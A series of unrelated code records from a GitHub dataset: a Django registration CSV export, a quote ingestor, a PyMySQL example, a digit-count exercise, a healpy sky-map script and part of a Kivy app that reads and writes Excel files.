(\n f'attachment; filename=\"conclave_{conclave_config.year}_registration.csv\"')\n\n # IMPORTANT: Update CSV_HEADERS below if you\n # update the CSV dicts.\n writer = csv.DictWriter(response, fieldnames=CSV_HEADERS, extrasaction='ignore')\n writer.writeheader()\n\n entries = RegistrationEntry.objects.filter(\n conclave_config=conclave_config).order_by('payment_info__pk')\n for entry in entries:\n if not hasattr(entry, 'payment_info') or entry.payment_info.stripe_payment_method_id == '':\n continue\n\n row = {\n 'sequence_id': entry.payment_info.id,\n\n 'USER INFO': '',\n **user_info_to_dict(entry),\n\n 'program': entry.program,\n 'is_late': entry.is_late,\n 'stripe_payment_method_id': entry.payment_info.stripe_payment_method_id,\n\n 'INSTRUMENTS': '',\n **instruments_to_dict(entry),\n\n 'CLASSES': '',\n **classes_to_dict(entry),\n\n 'ADVANCED PROJECTS': '',\n **advanced_projects_to_dict(entry),\n\n 'WORK-STUDY': '',\n **work_study_to_dict(entry),\n\n 'HOUSING': '',\n **housing_to_dict(entry),\n\n 'EXTRAS': '',\n **extras_to_dict(entry),\n\n 'CHARGES': '',\n **charges_to_dict(entry),\n 'charges': json.dumps(get_charges_summary(entry), indent=4),\n }\n print(row)\n writer.writerow(row)\n\n return response\n\n\ndef user_info_to_dict(entry: RegistrationEntry) -> dict[str, object]:\n result: dict[str, object] = {\n 'email': entry.user.username,\n 'first_name': entry.user.first_name,\n 'last_name': entry.user.last_name,\n }\n\n if not hasattr(entry, 'additional_info'):\n return result\n\n info: AdditionalRegistrationInfo = entry.additional_info\n\n result.update({\n 'nickname': info.nickname,\n 'address_line_1': entry.user.address_line_1,\n 'address_line_2': entry.user.address_line_2,\n 'address_city': entry.user.address_city,\n 'address_state': entry.user.address_state,\n 'address_postal_code': entry.user.address_postal_code,\n 'address_country': entry.user.address_country,\n 'conclave_phone': entry.additional_info.phone,\n 'phone1': entry.user.phone1,\n 'phone2': entry.user.phone2,\n\n 'age': info.age,\n 'gender': info.gender,\n 'pronouns': info.pronouns,\n\n 'include_in_whos_coming_to_conclave_list': info.include_in_whos_coming_to_conclave_list,\n 'attended_conclave_before': info.attended_conclave_before,\n 'buddy_willingness': info.buddy_willingness,\n 'wants_display_space': info.wants_display_space,\n 'num_display_space_days': (\n info.num_display_space_days if info.wants_display_space == YesNo.yes else 0\n ),\n 'liability_release': info.liability_release,\n 'covid_policy': info.covid_policy,\n 'photo_release_auth': info.photo_release_auth,\n 'other_info': info.other_info,\n })\n\n return result\n\n\ndef instruments_to_dict(entry: RegistrationEntry) -> Dict[str, Any]:\n instruments_str = ''\n for instr in entry.instruments_bringing.all():\n instruments_str += (\n str(instr) + f' | {instr.level} | {\",\".join(instr.clefs)} '\n f'| {instr.purpose} | {instr.comments}\\n'\n )\n\n result = {\n 'instruments_bringing': instruments_str,\n }\n if hasattr(entry, 'beginner_instruments'):\n result['beginner_needs_instrument'] = entry.beginner_instruments.needs_instrument\n result['beginner_instrument_bringing'] = entry.beginner_instruments.instrument_bringing\n\n return result\n\n\ndef classes_to_dict(entry: RegistrationEntry) -> dict[str, str]:\n if not hasattr(entry, 'regular_class_choices'):\n return {}\n\n class_prefs = entry.regular_class_choices\n result = {'comments': class_prefs.comments}\n\n # periodX_choiceY and periodX_choiceY_instrument fields\n for period in Period:\n for choice in range(1, 4):\n choice_attr = f'period{period}_choice{choice}'\n instr_attr = choice_attr + '_instrument'\n result[choice_attr] = getattr(class_prefs, choice_attr)\n result[instr_attr] = getattr(class_prefs, instr_attr)\n\n result.update({\n 'flex_choice1': class_prefs.flex_choice1,\n 'flex_choice1_instrument': class_prefs.flex_choice1_instrument,\n 'flex_choice2': class_prefs.flex_choice2,\n 'flex_choice2_instrument': class_prefs.flex_choice2_instrument,\n 'flex_choice3': class_prefs.flex_choice3,\n 'flex_choice3_instrument': class_prefs.flex_choice3_instrument,\n })\n\n return result\n\n\ndef advanced_projects_to_dict(entry: RegistrationEntry) -> Dict[str, str]:\n if not hasattr(entry, 'advanced_projects'):\n return {}\n\n return {\n 'participation': entry.advanced_projects.participation,\n 'project_proposal': entry.advanced_projects.project_proposal,\n }\n\n\ndef work_study_to_dict(entry: RegistrationEntry) -> Dict[str, str]:\n if not hasattr(entry, 'work_study'):\n return {}\n\n work_study: WorkStudyApplication = entry.work_study\n return {\n 'applying_for_work_study': work_study.wants_work_study,\n 'phone_number': work_study.phone_number,\n 'can_receive_texts_at_phone_number': work_study.can_receive_texts_at_phone_number,\n 'has_been_to_conclave': work_study.has_been_to_conclave,\n 'has_done_work_study': work_study.has_done_work_study,\n 'student_info': work_study.student_info,\n 'can_arrive_before_first_meeting': work_study.can_arrive_before_first_meeting,\n 'early_arrival': work_study.early_arrival,\n 'can_stay_until_sunday_afternoon': work_study.can_stay_until_sunday_afternoon,\n 'other_travel_info': work_study.other_travel_info,\n 'job_preferences': ','.join(work_study.job_preferences),\n 'other_jobs': work_study.other_jobs,\n 'has_car': work_study.has_car,\n 'relevant_job_experience': work_study.relevant_job_experience,\n 'other_skills': work_study.other_skills,\n 'other_info': work_study.other_info,\n }\n\n\ndef housing_to_dict(entry: RegistrationEntry) -> dict[str, object]:\n if not hasattr(entry, 'housing'):\n return {}\n\n housing: Housing = entry.housing\n\n return {\n 'room_type': housing.room_type,\n 'roommate_request': housing.roommate_request,\n 'room_near_person_request': housing.room_near_person_request,\n 'normal_bed_time': housing.normal_bed_time,\n 'arrival_day': housing.arrival_day,\n 'departure_day': housing.departure_day,\n 'wants_housing_subsidy': housing.wants_housing_subsidy,\n 'wants_2023_housing_subsidy': housing.wants_2023_supplemental_discount,\n 'wants_canadian_currency_exchange_discount': (\n housing.wants_canadian_currency_exchange_discount\n ),\n 'additional_housing_info': housing.additional_housing_info,\n 'dietary_needs': ','.join(housing.dietary_needs),\n 'other_dietary_needs': housing.other_dietary_needs,\n 'banquet_food_choice': housing.banquet_food_choice,\n 'is_bringing_guest_to_banquet': housing.is_bringing_guest_to_banquet,\n 'banquet_guest_name': housing.banquet_guest_name,\n 'banquet_guest_food_choice': housing.banquet_guest_food_choice,\n }\n\n\ndef extras_to_dict(entry: RegistrationEntry) -> dict[str, object]:\n if not hasattr(entry, 'tshirts'):\n return {}\n\n return {\n 'tshirt1': entry.tshirts.tshirt1,\n 'tshirt2': entry.tshirts.tshirt2,\n 'donation': entry.tshirts.donation,\n }\n\n\ndef charges_to_dict(entry: RegistrationEntry) -> dict[str, float]:\n charges_summary = get_charges_summary(entry)\n result = {\n **{label: '' for label in CHARGE_CSV_LABELS},\n 'Work Study Scholarship': charges_summary['work_study_scholarship_amount'],\n 'Housing Subsidy?': charges_summary['apply_housing_subsidy'],\n 'Housing 2023 Single Room Subsidy?': charges_summary['apply_2023_housing_subsidy'],\n 'Trust Discount?': charges_summary['apply_canadian_discount'],\n 'Subtotal': charges_summary['subtotal'],\n 'Total': charges_summary['total'],\n }\n\n for charge in charges_summary['charges']:\n result[charge['csv_label']] = charge['amount']\n\n return result\n\n\n# IMPORTANT: Update this list when you update the CSV dicts.\nCSV_HEADERS = [\n 'sequence_id',\n\n 'USER INFO',\n 'email',\n 'first_name',\n 'last_name',\n 'nickname',\n 'address_line_1',\n 'address_line_2',\n 'address_city',\n 'address_state',\n 'address_postal_code',\n 'address_country',\n 'conclave_phone',\n 'phone1',\n 'phone2',\n 'age',\n 'gender',\n 'pronouns',\n 'include_in_whos_coming_to_conclave_list',\n 'attended_conclave_before',\n 'buddy_willingness',\n 'wants_display_space',\n 'num_display_space_days',\n 'liability_release',\n 'covid_policy',\n 'photo_release_auth',\n 'other_info',\n\n 'program',\n 'is_late',\n 'stripe_payment_method_id',\n\n 'INSTRUMENTS',\n 'instruments_bringing',\n 'beginner_needs_instrument',\n 'beginner_instrument_bringing',\n\n 'CLASSES',\n 'comments',\n *list(itertools.chain.from_iterable(\n (f'period{period}_choice{choice}', f'period{period}_choice{choice}_instrument')\n for choice in range(1, 4)\n for period in Period\n )),\n 'flex_choice1',\n 'flex_choice1_instrument',\n 'flex_choice2',\n 'flex_choice2_instrument',\n 'flex_choice3',\n 'flex_choice3_instrument',\n\n 'ADVANCED PROJECTS',\n 'participation',\n 'project_proposal',\n\n 'WORK-STUDY',\n 'applying_for_work_study',\n 'phone_number',\n 'can_receive_texts_at_phone_number',\n 'has_been_to_conclave',\n 'has_done_work_study',\n 'student_info',\n 'can_arrive_before_first_meeting',\n 'early_arrival',\n 'can_stay_until_sunday_afternoon',\n 'other_travel_info',\n 'job_preferences',\n 'other_jobs',\n 'has_car',\n 'relevant_job_experience',\n 'other_skills',\n 'other_info',\n\n 'HOUSING',\n 'room_type',\n 'roommate_request',\n 'room_near_person_request',\n 'normal_bed_time',\n 'arrival_day',\n 'departure_day',\n 'wants_housing_subsidy',\n 'wants_2023_housing_subsidy',\n 'wants_canadian_currency_exchange_discount',\n 'additional_housing_info',\n 'dietary_needs',\n 'other_dietary_needs',\n 'banquet_food_choice',\n 'is_bringing_guest_to_banquet',\n 'banquet_guest_name',\n 'banquet_guest_food_choice',\n\n 'EXTRAS',\n 'tshirt1',\n 'tshirt2',\n 'donation',\n\n 'CHARGES',\n *CHARGE_CSV_LABELS,\n 'Work Study Scholarship',\n 'Housing Subsidy?',\n 'Housing 2023 Single Room Subsidy?',\n 'Trust Discount?',\n 'Subtotal',\n 'Total',\n 'charges',\n]\n\n# -----------------------------------------------------------------------------\n\n\nclass DownloadFirstClassChoicesCSVView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, *args: Any, **kwargs: Any) -> HttpResponse:\n return make_class_first_choices_csv(\n get_object_or_404(ConclaveRegistrationConfig, pk=self.kwargs['conclave_config_pk'])\n )\n\n def test_func(self) -> bool:\n return is_conclave_team(self.request.user)\n\n\ndef make_class_first_choices_csv(conclave_config: ConclaveRegistrationConfig) -> HttpResponse:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = (\n f'attachment; filename=\"conclave_{conclave_config.year}_class_first_choices.csv\"')\n\n classes = list(conclave_config.classes.all())\n first_choices_per_class = {str(class_): [] for class_ in classes}\n\n for entry in conclave_config.registration_entries.order_by('pk'):\n if not entry.is_finalized or not hasattr(entry, 'regular_class_choices'):\n continue\n\n choices = entry.regular_class_choices\n\n if choices.period1_choice1:\n first_choices_per_class[str(choices.period1_choice1)].append(entry.user)\n if choices.period2_choice1:\n first_choices_per_class[str(choices.period2_choice1)].append(entry.user)\n if choices.period3_choice1:\n first_choices_per_class[str(choices.period3_choice1)].append(entry.user)\n if choices.period4_choice1:\n first_choices_per_class[str(choices.period4_choice1)].append(entry.user)\n\n if choices.flex_choice1:\n first_choices_per_class[str(choices.flex_choice1)].append(entry.user)\n\n writer = csv.DictWriter(response, fieldnames=['Class', 'Who Picked as First Choice'])\n writer.writeheader()\n for class_name, first_choices in first_choices_per_class.items():\n writer.writerow({\n 'Class': class_name,\n 'Who Picked as First Choice': '\\n'.join(\n map(lambda user: f'{user.first_name} {user.last_name} ({user.username})',\n first_choices)\n )\n })\n\n return response\n","repo_name":"vdgsa/user_backend","sub_path":"vdgsa_backend/conclave_registration/views/registration_csv_view.py","file_name":"registration_csv_view.py","file_ext":"py","file_size_in_byte":14259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"27373638479","text":"\"\"\"Module for ingesting TXT files.\"\"\"\nfrom .IngestorInterface import IngestorInterface\nfrom .QuoteModel import QuoteModel\n\n\nclass TextIngestor(IngestorInterface):\n \"\"\"Class for ingesting TXT files.\"\"\"\n\n allowed_extensions = [\"txt\"]\n\n @classmethod\n def parse(cls, path=\"../_data/DogQuotes/DogQuotesTXT.txt\"):\n \"\"\"Parse quote file.\"\"\"\n if not cls.can_ingest(path):\n raise Exception('cannot ingest this file type')\n quotes = []\n with open(path, 'r') as f:\n for line in f.readlines():\n body, author = line.strip('\\n').split(' - ')\n quotes.append({\"body\": body, \"author\": author})\n\n quote_models = []\n for quote in quotes:\n qm = QuoteModel(quote[\"body\"], quote[\"author\"])\n quote_models.append(qm)\n\n return quote_models\n","repo_name":"lemonez/udacity-memegen-project","sub_path":"src/QuoteEngine/TextIngestor.py","file_name":"TextIngestor.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6136314310","text":"# python连接mysql\n# 方法一:\n# import pymysql\n# conn = pymysql.connect(host='127.0.0.1', user='root', passwd='123456', db='devops', charset='utf8')\n# print(conn)\n# 打印出此信息说明python连接mysql成功。\n\n# 方法二:\nimport pymysql\nsqlArgs = {\n'host':'127.0.0.1',\n 'port': 3306,\n 'user': 'root',\n 'passwd': '123456',\n 'db': 'devops',\n 'charset': 'utf8'\n}\nconn = pymysql.connect(**sqlArgs)\nprint(conn)\n\ncursor = conn.cursor() # 建立游标\nrow = cursor.execute(\"show tables\") # 执行sql语句\ndata = cursor.fetchone() # 取出一条数据\ndata = cursor.fetchmany(3) # 取出3条数据\ndata = cursor.fetchall() # 全部取出\nprint(data)\n\n# 新增数据\n# 单条\n# row=cursor.execute(\"insert into stars (name,age)values('邓肯',23)\")\n# row=cursor.execute('insert into stars(name,age) VALUES (%s,%s)',('科比',23))\nconn.commit()\n\n# 批量\nrows=cursor.executemany('insert into stars(name,age) VALUES (%s,%s)',[('杜兰特',1),('卡哇伊',2)])\nconn.commit()\n\ncursor.close()\nconn.close()\n\n# 完整规范示例:\ntry:\n rows=cursor.executemany('insert into stars(name,age) VALUES (%s,%s)',[('杜兰特',1),('卡哇伊',2)])\n conn.commit()\nexcept :\n conn.rollback()\nfinally:\n cursor.close()\n conn.close()","repo_name":"1712825001/fullstack","sub_path":"【0】网络拾遗/python连接mysql、redis、mongodb/pymysql.py","file_name":"pymysql.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28978083536","text":"N = int(input())\r\nsumma = 0 # накапливаем сумму\r\ncnt = 0 # накапливаем количество чисел\r\nd = 0 # текущая степень десятки = количество цифр в числах\r\nwhile True:\r\n d += 1 \r\n summa += .9 * 10 ** d * d # например, для двузначных: 90 чисел, в них 90 * 2 цифр\r\n if summa > N: # остановиться, этот разряд уже целиком не прибавляем\r\n break\r\n cnt += .9 * 10 ** d # добавить в счет все d-разрядные числа\r\nsumma -= .9 * 10 ** d * d # вычитаем последнее слагаемое из суммы\r\ncnt += (N - summa) / d # вычитаем накопленную сумму, находим, сколько не хватает чисел текущей разрядности\r\nprint(cnt)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n''' \r\nn = int(input())\r\nresult = 0\r\ndegree = 0 # степень 10\r\ndigits = 1 # количество цифр в числе\r\nwhile True:\r\n if n < 9 * digits * 10 ** degree:\r\n result += n // digits\r\n break\r\n else:\r\n n -= 9 * (10 ** degree) * digits\r\n result += 9 * (10 ** degree)\r\n degree += 1\r\n digits += 1\r\nprint(result)\r\n'''","repo_name":"varvalamey/1535-radio-fuck-off","sub_path":"km.py","file_name":"km.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26987402771","text":"# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport healpy\nimport os\nimport sys\nimport astropy.coordinates\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.utils.data import get_pkg_data_filename\nfrom astropy.time import Time\n\n\n# In[2]:\n\n\n# file can be retrived by running !wget http://danielcjacobs.com/uploads/test4.fits\nmappy = healpy.read_map(\"test4.fits\")\n\n\n# In[21]:\n\n\ndef get_map():\n # Get current time\n now = Time.now()\n sidereal = now.sidereal_time(\"mean\", longitude=22.13303)\n loc = astropy.coordinates.EarthLocation(lon=22.13303, lat=-31.58)\n T = Time(now, format=\"datetime\", location=loc)\n # T = Time('2019-07-23 15:46:30', scale='utc', location = loc)\n print(T)\n\n ra = (now.sidereal_time(\"mean\", longitude=22.13303)) / u.hourangle\n dec = -31.58\n rot = [-112.13, -31.06]\n\n moon = astropy.coordinates.get_moon(T, location=loc, ephemeris=None)\n sun = astropy.coordinates.get_sun(T)\n\n ssbodies = [\"mercury\", \"venus\", \"mars\", \"jupiter\", \"saturn\", \"neptune\", \"uranus\"]\n colors = [\"grey\", \"pink\", \"red\", \"orange\", \"yellow\", \"blue\", \"blue\", \"blue\"]\n\n pic = astropy.coordinates.SkyCoord(\n ra=\"05h19m49.7230919028\", dec=\"−45° 46′ 44″\"\n ) # Pictor\n forn = astropy.coordinates.SkyCoord(ra=\"03h23m25.1s\", dec=\"-37° 08\")\n cass = astropy.coordinates.SkyCoord(ra=\"23h 23m 24s\", dec=\"+58° 48.9′\")\n crab = astropy.coordinates.SkyCoord(ra=\"05h 34m 31s\", dec=\"+22° 00′ 52.2″\")\n lmc = astropy.coordinates.SkyCoord(ra=\"05h 40m 05s\", dec=\"−69° 45′ 51″\")\n smc = astropy.coordinates.SkyCoord(ra=\"00h 52m 44.8s\", dec=\"−72° 49′ 43″\")\n cenA = astropy.coordinates.SkyCoord(ra=\"13h 25m 27.6s\", dec=\"−43° 01′ 09″\")\n callibrator1 = astropy.coordinates.SkyCoord(\n ra=109.32351 * u.degree, dec=-25.0817 * u.degree\n )\n callibrator2 = astropy.coordinates.SkyCoord(\n ra=30.05044 * u.degree, dec=-30.89106 * u.degree\n )\n callibrator3 = astropy.coordinates.SkyCoord(\n ra=6.45484 * u.degree, dec=-26.0363 * u.degree\n )\n\n source_list = [\n [moon, \"moon\", \"slategrey\"],\n [sun, \"sun\", \"y\"],\n [pic, \"pictor\", \"w\"],\n [forn, \"fornax\", \"w\"],\n [cass, \"Cass A\", \"w\"],\n [crab, \"Crab\", \"w\"],\n [lmc, \"LMC\", \"w\"],\n [cenA, \"Cen A\", \"w\"],\n [smc, \"SMC\", \"w\"],\n [callibrator1, \"J071717.6-250454\", \"r\"],\n [callibrator2, \"J020012.1-305327\", \"r\"],\n [callibrator3, \" J002549.1-260210\", \"r\"],\n ]\n\n healpy.orthview(\n np.log10(mappy),\n coord=[\"G\", \"C\"],\n rot=rot,\n return_projected_map=True,\n max=2,\n half_sky=0,\n )\n\n for item in source_list:\n if item[1] == \"sun\":\n name = item[1]\n healpy.projscatter(\n item[0].ra, item[0].dec, lonlat=True, s=1000, c=item[2], label=name\n )\n healpy.projtext(item[0].ra, item[0].dec, lonlat=True, c=\"k\", s=name)\n if item[1] == \"moon\":\n name = item[1]\n healpy.projscatter(\n item[0].ra, item[0].dec, lonlat=True, s=200, c=item[2], label=name\n )\n healpy.projtext(item[0].ra, item[0].dec, lonlat=True, c=\"k\", s=name)\n else:\n name = item[1]\n healpy.projscatter(\n item[0].ra, item[0].dec, lonlat=True, s=50, c=item[2], label=name\n )\n healpy.projtext(item[0].ra, item[0].dec, lonlat=True, c=\"k\", s=name)\n\n count = 0\n for body in ssbodies:\n name = body\n body = astropy.coordinates.get_body(body, T)\n healpy.projscatter(\n body.ra, body.dec, lonlat=True, s=50, c=colors[count], label=name\n )\n healpy.projtext(body.ra, body.dec, lonlat=True, c=\"k\", s=name)\n count += 1\n\n\nget_map()\nplt.savefig(\"out.png\")\n","repo_name":"HERA-Team/simple-dashboard","sub_path":"generator/radioskyhpx.py","file_name":"radioskyhpx.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18742851424","text":"from email.utils import collapse_rfc2231_value\nfrom tkinter import dialog\nfrom kivy.lang import Builder\nfrom kivy.properties import StringProperty, NumericProperty\nfrom kivy.uix.screenmanager import Screen\nfrom kivymd.icon_definitions import md_icons\nfrom kivymd.app import MDApp\nfrom kivymd.uix.list import OneLineIconListItem\nfrom kivy.uix.textinput import TextInput\nfrom kivymd.uix.textfield import MDTextField\nfrom kivymd.uix.button import MDRaisedButton\nfrom kivy.core.audio import SoundLoader\nfrom random import randrange\nfrom kivy.config import Config\nfrom kivy.properties import ObjectProperty\nimport sys\nfrom kivy.properties import ObjectProperty, NumericProperty, StringProperty, \\\n BooleanProperty, DictProperty, OptionProperty, ListProperty, ColorProperty\nfrom kivy.logger import Logger\nfrom kivy.graphics import Color, BorderImage, Canvas\nfrom kivy.uix.textinput import TextInput\n\n#importei daqui\nfrom kivymd.uix.menu import MDDropdownMenu\nfrom kivy.metrics import dp\n\n#flatbutton e dialog\nfrom kivymd.uix.button import MDFlatButton\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.list import OneLineAvatarIconListItem\nfrom kivymd.uix.list import OneLineAvatarListItem\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivymd.uix.snackbar import Snackbar\nfrom kivy.core.window import Window\nfrom kivymd.uix.card import MDSeparator\n\n#imports do excell\n\nimport kivy \nfrom kivy.app import App \nimport os\nfrom kivy.utils import platform\nfrom datetime import datetime\nimport openpyxl\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\n\nfrom kivy.uix.screenmanager import ScreenManager, Screen\n\nkivy.require('2.0.0')\nnow1 = datetime.now()\ndataAtual=now1.strftime(\"%d-%m-%Y %Hh%M\")\ndirdi=os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\")\n\ndef log(pop):\n with open(dirdi+\"Log.txt\", 'a') as f:\n print(str(datetime.now())+\" \"+pop, file=f)\n print(pop)\n\nif platform == 'android':\n\n import android\n\n from android.permissions import request_permissions, Permission\n #request_permissions([Permission.WRITE_EXTERNAL_STORAGE, Permission.READ_EXTERNAL_STORAGE])\n\n from android.storage import primary_external_storage_path\n\n #criação e checagem de diretorios\n dirPrincipal = os.path.join(r\"/storage/emulated/0/Documents/Pap appy\")\n dirDadosSalvos = os.path.join(r\"/storage/emulated/0/Documents/Pap appy/Dados Salvos\")\n \n try:\n os.makedirs(dirPrincipal)\n log(\"debug: O Diretório \" + dirPrincipal + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirPrincipal + \" não foi criado pois ele já existe!\")\n\n\n\n try:\n os.makedirs(dirDadosSalvos)\n log(\"debug: O Diretório \" + dirDadosSalvos + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirDadosSalvos + \" não foi criado pois ele já existe!\")\n \n #checagem do banco de dados raiz\n\n try:\n dirDoExcellSecundario = os.path.join(r\"/storage/emulated/0/Documents/Pap appy/locais.xlsx\")\n dirDoExcell = os.path.join(r\"/storage/emulated/0/Documents/Pap appy/ticbk.xlsx\")\n wb = openpyxl.load_workbook(dirDoExcell)\n wd= openpyxl.load_workbook(dirDoExcellSecundario)\n except FileNotFoundError as not_found:\n dirDoExcellSecundario = os.path.join(r\"locais.xlsx\")\n dirDoExcell = os.path.join(r\"pap.xlsx\")\n wb = openpyxl.load_workbook(dirDoExcell)\n wd= openpyxl.load_workbook(dirDoExcellSecundario)\n\n dirExcellDadosSalvos=os.path.join(r\"/storage/emulated/0/Documents/Pap appy/Dados salvos/Dados salvos \"+dataAtual+\".xlsx\")\n log(\"debug: o diretorio do excell é: \"+dirDoExcell)\n \nelse:\n #Criação e checagem de diretorios\n dirPrincipal = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\")\n dirDadosSalvos = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\Dados Salvos\")\n \n \n try:\n os.makedirs(dirPrincipal)\n log(\"debug: O Diretório \" + dirPrincipal + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirPrincipal + \" não foi criado pois ele já existe!\")\n\n\n\n try:\n os.makedirs(dirDadosSalvos)\n log(\"debug: O Diretório \" + dirDadosSalvos + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirDadosSalvos + \" não foi criado pois ele já existe!\")\n\n #Checagem do banco de dados raiz\n try:\n dirDoExcellSecundario = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\locais.xlsx\")\n dirDoExcell = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\pap.xlsx\")\n wd=openpyxl.load_workbook(dirDoExcellSecundario)\n wb = openpyxl.load_workbook(dirDoExcell)\n log(\"Debug: estamos utilizando o tic do docs,\"+\" o diretorio do excell é: \"+dirDoExcell)\n\n \n except FileNotFoundError as not_found:\n dirDoExcellSecundario = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Downloads\\\\vac.xlsx\")\n dirDoExcell = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Downloads\\\\vac2.xlsx\") \n wd=openpyxl.load_workbook(dirDoExcellSecundario)\n wb = openpyxl.load_workbook(dirDoExcell)\n log(\"debug: estamos utilizando o tic da raiz, o diretorio do excell é: \"+ dirDoExcell)\n dirExcellDadosSalvos=os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\Dados salvos\\\\Dados salvos \"+dataAtual+\".xlsx\")\n\n\n#configurações do excell\n\nwz=wd.active\nws = wb.active\n\nfrom openpyxl import Workbook\nbook = Workbook()\nsheet = book.active\nheaders = ['CPF','Nome','Ultima Vacina','Vacinas Tomadas', '', '','Data de salvamento']\nsheet.append(headers) \n\n\n#cores do app\ncolors = {\n \"Red\": {\n \"50\": \"FFEBEE\",\n \"100\": \"FFCDD2\",\n \"200\": \"EF9A9A\",\n \"300\": \"E57373\",\n \"400\": \"EF5350\",\n \"500\": \"F44336\",\n \"600\": \"E53935\",\n \"700\": \"D32F2F\",\n \"800\": \"C62828\",\n \"900\": \"B71C1C\",\n \"A100\": \"FF8A80\",\n \"A200\": \"FF5252\",\n \"A400\": \"FF1744\",\n \"A700\": \"D50000\",\n },\n \"Pink\": {\n \"50\": \"FCE4EC\",\n \"100\": \"F8BBD0\",\n \"200\": \"F48FB1\",\n \"300\": \"F06292\",\n \"400\": \"EC407A\",\n \"500\": \"E91E63\",\n \"600\": \"D81B60\",\n \"700\": \"C2185B\",\n \"800\": \"AD1457\",\n \"900\": \"880E4F\",\n \"A100\": \"FF80AB\",\n \"A200\": \"FF4081\",\n \"A400\": \"F50057\",\n \"A700\": \"C51162\",\n },\n \"Purple\": {\n \"50\": \"F3E5F5\",\n \"100\": \"E1BEE7\",\n \"200\": \"CE93D8\",\n \"300\": \"BA68C8\",\n \"400\": \"AB47BC\",\n \"500\": \"9C27B0\",\n \"600\": \"8E24AA\",\n \"700\": \"7B1FA2\",\n \"800\": \"6A1B9A\",\n \"900\": \"4A148C\",\n \"A100\": \"EA80FC\",\n \"A200\": \"E040FB\",\n \"A400\": \"D500F9\",\n \"A700\": \"AA00FF\",\n },\n \"DeepPurple\": {\n \"50\": \"EDE7F6\",\n \"100\": \"D1C4E9\",\n \"200\": \"B39DDB\",\n \"300\": \"9575CD\",\n \"400\": \"7E57C2\",\n \"500\": \"673AB7\",\n \"600\": \"5E35B1\",\n \"700\": \"512DA8\",\n \"800\": \"4527A0\",\n \"900\": \"311B92\",\n \"A100\": \"B388FF\",\n \"A200\": \"7C4DFF\",\n \"A400\": \"651FFF\",\n \"A700\": \"6200EA\",\n },\n \"Indigo\": {\n \"50\": \"E8EAF6\",\n \"100\": \"C5CAE9\",\n \"200\": \"9FA8DA\",\n \"300\": \"7986CB\",\n \"400\": \"5C6BC0\",\n \"500\": \"3F51B5\",\n \"600\": \"3949AB\",\n \"700\": \"303F9F\",\n \"800\": \"283593\",\n \"900\": \"1A237E\",\n \"A100\": \"8C9EFF\",\n \"A200\": \"536DFE\",\n \"A400\": \"3D5AFE\",\n \"A700\": \"304FFE\",\n },\n \"Blue\": {\n \"50\": \"E3F2FD\",\n \"100\": \"BBDEFB\",\n \"200\": \"90CAF9\",\n \"300\": \"64B5F6\",\n \"400\": \"42A5F5\",\n \"500\": \"2196F3\",\n \"600\": \"1E88E5\",\n \"700\": \"1976D2\",\n \"800\": \"1565C0\",\n \"900\": \"0D47A1\",\n \"A100\": \"82B1FF\",\n \"A200\": \"448AFF\",\n \"A400\": \"2979FF\",\n \"A700\": \"2962FF\",\n },\n \"LightBlue\": {\n \"50\": \"E1F5FE\",\n \"100\": \"B3E5FC\",\n \"200\": \"81D4FA\",\n \"300\": \"4FC3F7\",\n \"400\": \"29B6F6\",\n \"500\": \"03A9F4\",\n \"600\": \"039BE5\",\n \"700\": \"0288D1\",\n \"800\": \"0277BD\",\n \"900\": \"01579B\",\n \"A100\": \"80D8FF\",\n \"A200\": \"40C4FF\",\n \"A400\": \"00B0FF\",\n \"A700\": \"0091EA\",\n },\n \"Cyan\": {\n \"50\": \"E0F7FA\",\n \"100\": \"B2EBF2\",\n \"200\": \"80DEEA\",\n \"300\": \"4DD0E1\",\n \"400\": \"26C6DA\",\n \"500\": \"00BCD4\",\n \"600\": \"00ACC1\",\n \"700\": \"0097A7\",\n \"800\": \"00838F\",\n \"900\": \"006064\",\n \"A100\": \"84FFFF\",\n \"A200\": \"18FFFF\",\n \"A400\": \"00E5FF\",\n \"A700\": \"00B8D4\",\n },\n \"Teal\": {\n \"50\": \"E0F2F1\",\n \"100\": \"B2DFDB\",\n \"200\": \"80CBC4\",\n \"300\": \"4DB6AC\",\n \"400\": \"26A69A\",\n \"500\": \"009688\",\n \"600\": \"00897B\",\n \"700\": \"00796B\",\n \"800\": \"00695C\",\n \"900\": \"004D40\",\n \"A100\": \"A7FFEB\",\n \"A200\": \"64FFDA\",\n \"A400\": \"1DE9B6\",\n \"A700\": \"00BFA5\",\n },\n \"Green\": {\n 